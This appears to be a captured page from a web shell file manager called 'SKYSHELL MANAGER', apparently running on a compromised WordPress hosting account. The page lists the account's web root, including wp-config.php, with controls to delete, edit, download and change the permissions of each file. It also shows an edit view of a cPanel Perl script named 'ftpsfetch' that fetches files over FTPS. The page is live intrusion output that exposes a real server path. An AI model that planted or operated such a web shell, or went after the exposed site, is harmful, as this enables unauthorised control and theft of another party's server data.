📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home4
/
cvysxmmy
/
public_html
/
antenmills-justadd10-com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
3.38 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
.htaccess.nfd-backup
3.38 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
.htaccess.phpupgrader.21100a0f
2.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
.htaccess.phpupgrader.initial
2.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
227638.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
0.4 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
readme.html
7.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cli.yml
0.03 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
3.33 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
5.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
3.84 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-login.php
50.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
31.88 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-signup.php
33.81 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: ftpsfetch
#!/usr/local/cpanel/3rdparty/bin/perl my $hasnetsslftp; eval { require Net::FTPSSL; $hasnetsslftp = 1; }; die if ( !$hasnetsslftp ); my (%ARGS) = parseargv(); if ( $ARGS{user} eq "" ) { die "Sorry, you must specify a user to login to the remote server as."; } if ( $ARGS{host} eq "" ) { die "Sorry, you must specify a remote server."; } if ( $ARGS{srcfile} eq "" ) { die "Sorry you must specify a source file.\n"; } if ( $ARGS{destfile} eq "" ) { die "Sorry you must specify a destfile file.\n"; } if ( $ARGS{port} eq "22" ) { print "Assuming port 21 since 22 was specified!\n"; $ARGS{port} = 21; } my $pass = <STDIN>; chomp($pass); if ( my $pid = fork() ) { while ( waitpid( $pid, 1 ) != -1 ) { print ".\n"; sleep(1); } } else { my $ftp; if ( $ARGS{'port'} ne "" ) { $ftp = Net::FTPSSL->new( $ARGS{host}, Debug => 1, Passive => 1, Port => $ARGS{'port'}, encryption => 'E' ) || die "Cannot connect to $ARGS{host}:$ARGS{port} $@"; } else { $ftp = Net::FTPSSL->new( $ARGS{host}, Debug => 1, Passive => 1, Port => 21, encryption => 'E' ) || die "Cannot connect to $ARGS{host}:21: $@"; } $ftp->login( $ARGS{user}, $pass ) || die "Cannot login ", $ftp->last_message; my (@FINFO) = split( /\//, $ARGS{srcfile} ); my $file; my $dir; if ( $ARGS{srcfile} =~ /^\// ) { shift(@FINFO); #/ shift(@FINFO); #home shift(@FINFO); #user } $file = pop(@FINFO); $dir = join( "/", @FINFO ); $ftp->cwd($dir) || die "Cannot change working directory ", $ftp->last_message; my (@DEST) = split( /\//, $ARGS{destfile} ); my $destfile = pop(@DEST); my $destdir = join( "/", @DEST ); if ( $destdir ne "" ) { chdir($destdir); } if ( $destfile ne '.' ) { $ftp->get( $file, $destfile ) || die "get failed ", $ftp->last_message; } else { $ftp->get($file) || die "get failed ", $ftp->last_message; } $ftp->quit(); exit(); } sub parseargv { my (%ARGS); while ( $#ARGV != -1 ) { $_ = $ARGV[0]; if (/^\-\-/) { my $arg = shift(@ARGV); $arg =~ s/^\-\-//g; $arg =~ tr/[A-Z]/[a-z]/; my $value = shift(@ARGV); $ARGS{$arg} = $value; } else { last; } } return (%ARGS); }
Save